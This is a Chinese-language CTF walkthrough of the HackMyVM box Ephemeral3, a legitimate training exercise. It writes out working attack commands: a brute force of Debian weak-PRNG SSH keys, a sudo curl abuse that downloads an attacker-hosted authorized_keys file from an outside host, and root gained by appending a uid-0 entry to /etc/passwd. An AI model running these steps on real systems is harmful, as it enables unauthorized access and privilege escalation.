HackMyVM-Ephemeral3

信息搜集

主机发现

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:39:60:4c, IPv4: 192.168.43.126
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.43.1    c6:45:66:05:91:88       (Unknown: locally administered)
192.168.43.197  04:6c:59:bd:33:50       Intel Corporate
192.168.43.201  08:00:27:02:db:9c       PCS Systemtechnik GmbH
192.168.43.190  52:e3:0c:b3:67:97       (Unknown: locally administered)4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded

端口扫描

┌──(kali㉿kali)-[~]
└─$ nmap --min-rate 10000 -p- 192.168.43.201
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 01:32 EDT
Nmap scan report for ephemeral (192.168.43.201)
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:02:DB:9C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 1.98 seconds┌──(kali㉿kali)-[~]
└─$ nmap -sS -sV -O -p22,80 192.168.43.201  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-31 01:32 EDT
Nmap scan report for ephemeral (192.168.43.201)
Host is up (0.00036s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 08:00:27:02:DB:9C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.82 seconds

漏洞利用

目录扫描

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.43.201 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,txt,php,jpg,png,zip,git
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.43.201
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,jpg,png,zip,git,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10918]
/note.txt             (Status: 200) [Size: 159]
/agency               (Status: 301) [Size: 315] [--> http://192.168.43.94/agency/]                                                
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 278]                                          
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================

/mote.txt

搜索一下 OpenSSH 8.2p1的漏洞

┌──(kali㉿kali)-[~]
└─$ searchsploit openssl ssh
------------------------------- ---------------------------------Exploit Title                 |  Path
------------------------------- ---------------------------------
OpenSSL 0.9.8c-1 < 0.9.8g-9 (D | linux/remote/5622.txt
OpenSSL 0.9.8c-1 < 0.9.8g-9 (D | linux/remote/5632.rb
OpenSSL 0.9.8c-1 < 0.9.8g-9 (D | linux/remote/5720.py
------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results┌──(kali㉿kali)-[~]
└─$ searchsploit -m 5720    Exploit: OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSHURL: https://www.exploit-db.com/exploits/5720Path: /usr/share/exploitdb/exploits/linux/remote/5720.pyCodes: OSVDB-45029, CVE-2008-3280, CVE-2008-0166Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/5720.py

利用

┌──(kali㉿kali)-[~]
└─$ wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
--2025-05-30 10:46:15--  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
Resolving gitlab.com (gitlab.com)... 172.65.251.78, 2606:4700:90:0:f22e:fbec:5bed:a9b9
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: ‘5622.tar.bz2’5622.tar.bz2     35%[=>      ]  16.88M  7.15KB/s    in 6m 15s  2025-05-30 10:52:32 (46.1 KB/s) - Read error at byte 17701470/50226987 (Error in the pull function.). Retrying.--2025-05-30 10:52:33--  (try: 2)  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
Connecting to gitlab.com (gitlab.com)|172.65.251.78|:443... connected.
HTTP request sent, awaiting response... 206 Partial Content
Length: 50226987 (48M), 32525517 (31M) remaining [application/octet-stream]
Saving to: ‘5622.tar.bz2’5622.tar.bz2    100%[++=====>]  47.90M  2.44MB/s    in 15s     2025-05-30 10:52:49 (2.09 MB/s) - ‘5622.tar.bz2’ saved [50226987/50226987]┌──(kali㉿kali)-[~]
└─$ tar -xvf 5622*┌──(kali㉿kali)-[~]
└─$ python2 5720.py rsa/2048 192.168.43.201 randyKey Found in file: 0028ca6d22c68ed0a1e3f6f79573100a-31671
Execute: ssh -lrandy -p22 -i rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.43.201Tested 26920 keys | Remaining 5848 keys | Aprox. Speed 3/sec

链接ssh

┌──(kali㉿kali)-[~]
└─$ ssh -lrandy -p22 -i rsa/2048/0028ca6d22c68ed0a1e3f6f79573100a-31671 192.168.43.201
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage193 updates can be applied immediately.
127 of these updates are standard security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jun 24 01:17:05 2022 from 10.0.0.69
randy@ephemeral:~$

权限提升

看一看都有什么

randy@ephemeral:~$ ls -la
total 56
drwxr-xr-x 11 randy randy 4096 Jun 23  2022 .
drwxr-xr-x  4 root  root  4096 Jun 23  2022 ..
lrwxrwxrwx  1 randy randy    9 Jun 23  2022 .bash_history -> /dev/null                                                          
-rw-r--r--  1 randy randy  220 Jun 23  2022 .bash_logout
-rw-r--r--  1 randy randy 3771 Jun 23  2022 .bashrc
drwxrwxr-x 10 randy randy 4096 Jun 23  2022 .cache
drwx------ 11 randy randy 4096 Jun 23  2022 .config
drwxr-xr-x  3 randy randy 4096 Jun 23  2022 Desktop
drwxr-xr-x  2 randy randy 4096 Jun 23  2022 Documents
drwxr-xr-x  2 randy randy 4096 Jun 23  2022 Downloads
drwx------  3 randy randy 4096 Jun 23  2022 .gnupg
drwxr-xr-x  3 randy randy 4096 Jun 23  2022 .local
-rw-r--r--  1 randy randy  807 Jun 23  2022 .profile
drwxr-xr-x  2 randy randy 4096 Jun 23  2022 Public
drwx------  2 randy randy 4096 Jun 23  2022 .ssh
-rw-r--r--  1 randy randy    0 Jun 23  2022 .sudo_as_admin_successful
randy@ephemeral:~$ sudo -l
Matching Defaults entries for randy on ephemeral:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser randy may run the following commands on ephemeral:(henry) NOPASSWD: /usr/bin/curl
randy@ephemeral:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/home/randy/Desktop/vmware-tools-distrib/lib/bin32/vmware-user-suid-wrapper
/home/randy/Desktop/vmware-tools-distrib/lib/bin64/vmware-user-suid-wrapper
/snap/core20/1328/usr/bin/chfn
/snap/core20/1328/usr/bin/chsh
/snap/core20/1328/usr/bin/gpasswd
/snap/core20/1328/usr/bin/mount
/snap/core20/1328/usr/bin/newgrp
/snap/core20/1328/usr/bin/passwd
/snap/core20/1328/usr/bin/su
/snap/core20/1328/usr/bin/sudo
/snap/core20/1328/usr/bin/umount
/snap/core20/1328/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1328/usr/lib/openssh/ssh-keysign
/snap/core20/1518/usr/bin/chfn
/snap/core20/1518/usr/bin/chsh
/snap/core20/1518/usr/bin/gpasswd
/snap/core20/1518/usr/bin/mount
/snap/core20/1518/usr/bin/newgrp
/snap/core20/1518/usr/bin/passwd
/snap/core20/1518/usr/bin/su
/snap/core20/1518/usr/bin/sudo
/snap/core20/1518/usr/bin/umount
/snap/core20/1518/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1518/usr/lib/openssh/ssh-keysign
/snap/snapd/24505/usr/lib/snapd/snap-confine
randy@ephemeral:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/snap/core20/1328/usr/bin/ping = cap_net_raw+ep
/snap/core20/1518/usr/bin/ping = cap_net_raw+ep
randy@ephemeral:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
henry:x:1001:1001::/home/henry:/bin/bash

我们可以利用curl来进行提权

提权

┌──(kali㉿kali)-[~]
└─$ ssh-keygen -t rsa -f /home/kali/henry     
Generating public/private rsa key pair.
Enter passphrase for "/home/kali/henry" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/henry
Your public key has been saved in /home/kali/henry.pub
The key fingerprint is:
SHA256:+A/dwXaQ24lEKUSPRNeM3Gf9v/W2npnbugE3uqT/rXU kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|         +=.o*  .|
|         ..=+.+ +|
|          ..=  o.|
|       .   o = ..|
|      . S   B * .|
|       . . o * .o|
|        o . + . E|
|         o o . =O|
|          o.o.*%=|
+----[SHA256]-----+
┌──(kali㉿kali)-[~]
└─$ mv henry.pub authorized_keys
randy@ephemeral:~$ sudo -u henry /usr/bin/curl http://192.168.43.126/authorized_keys -o /home/henry/.ssh/authorized_keys% Total    % Received % Xferd  Average Speed   Time    Time     Time  CurrentDload  Upload   Total   Spent    Left  Speed0     0    0     0    0     0      0      0 --:--:-- --:--:-- 100   563  100   563    0     0  31277      0 --:--:-- --:--:-- --:--:-- 31277
┌──(kali㉿kali)-[~]
└─$ ssh henry@192.168.43.201 -i henry          
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.13.0-30-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage193 updates can be applied immediately.
127 of these updates are standard security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.New release '22.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jun 24 01:30:47 2022 from 10.0.0.69
henry@ephemeral:~$ 

看一下都有什么

henry@ephemeral:~$ ls -la
total 40
drwxr-xr-x 6 henry henry 4096 Jun 24  2022 .
drwxr-xr-x 4 root  root  4096 Jun 23  2022 ..
lrwxrwxrwx 1 root  root     9 Jun 23  2022 .bash_history -> /dev/null                                                           
-rw-r--r-- 1 henry henry  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 henry henry 3771 Feb 25  2020 .bashrc
drwx------ 4 henry henry 4096 Jun 24  2022 .cache
drwx------ 4 henry henry 4096 Jun 24  2022 .config
drwxrwxr-x 3 henry henry 4096 Jun 23  2022 .local
-rw-r--r-- 1 henry henry  807 Feb 25  2020 .profile
drwx------ 2 henry henry 4096 May 31 02:12 .ssh
-rw------- 1 henry henry   33 Jun 23  2022 user.txt
henry@ephemeral:~$ sudo -l
[sudo] password for henry: 
Sorry, try again.
[sudo] password for henry: 
Sorry, try again.
[sudo] password for henry: 
sudo: 3 incorrect password attempts
henry@ephemeral:~$ find / -perm -u=s -type f 2>/dev/null
/usr/sbin/pppd
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/chsh
/usr/bin/umount
/usr/bin/su
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/home/randy/Desktop/vmware-tools-distrib/lib/bin32/vmware-user-suid-wrapper
/home/randy/Desktop/vmware-tools-distrib/lib/bin64/vmware-user-suid-wrapper
/snap/core20/1328/usr/bin/chfn
/snap/core20/1328/usr/bin/chsh
/snap/core20/1328/usr/bin/gpasswd
/snap/core20/1328/usr/bin/mount
/snap/core20/1328/usr/bin/newgrp
/snap/core20/1328/usr/bin/passwd
/snap/core20/1328/usr/bin/su
/snap/core20/1328/usr/bin/sudo
/snap/core20/1328/usr/bin/umount
/snap/core20/1328/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1328/usr/lib/openssh/ssh-keysign
/snap/core20/1518/usr/bin/chfn
/snap/core20/1518/usr/bin/chsh
/snap/core20/1518/usr/bin/gpasswd
/snap/core20/1518/usr/bin/mount
/snap/core20/1518/usr/bin/newgrp
/snap/core20/1518/usr/bin/passwd
/snap/core20/1518/usr/bin/su
/snap/core20/1518/usr/bin/sudo
/snap/core20/1518/usr/bin/umount
/snap/core20/1518/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1518/usr/lib/openssh/ssh-keysign
/snap/snapd/24505/usr/lib/snapd/snap-confine
henry@ephemeral:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/snap/core20/1328/usr/bin/ping = cap_net_raw+ep
/snap/core20/1518/usr/bin/ping = cap_net_raw+ep

user.txt

henry@ephemeral:~$ cat user.txt 
9c8e36b0cb30f09300592cb56bca0c3a

提权

henry@ephemeral:~$ openssl passwd -1 -salt 1234 1234
$1$1234$BdIMOAWFOV2AQlLsrN/Sw.
henry@ephemeral:~$ echo '1234:$1$1234$BdIMOAWFOV2AQlLsrN/Sw.:0:0:root:/root:/bin/bash' >> /etc/passwd
henry@ephemeral:~$ su 1234
Password: 
root@ephemeral:/home/henry# id
uid=0(root) gid=0(root) groups=0(root)

root.txt

root@ephemeral:~# cat root.txt 
b0a3dec84d09f03615f768c8062cec4d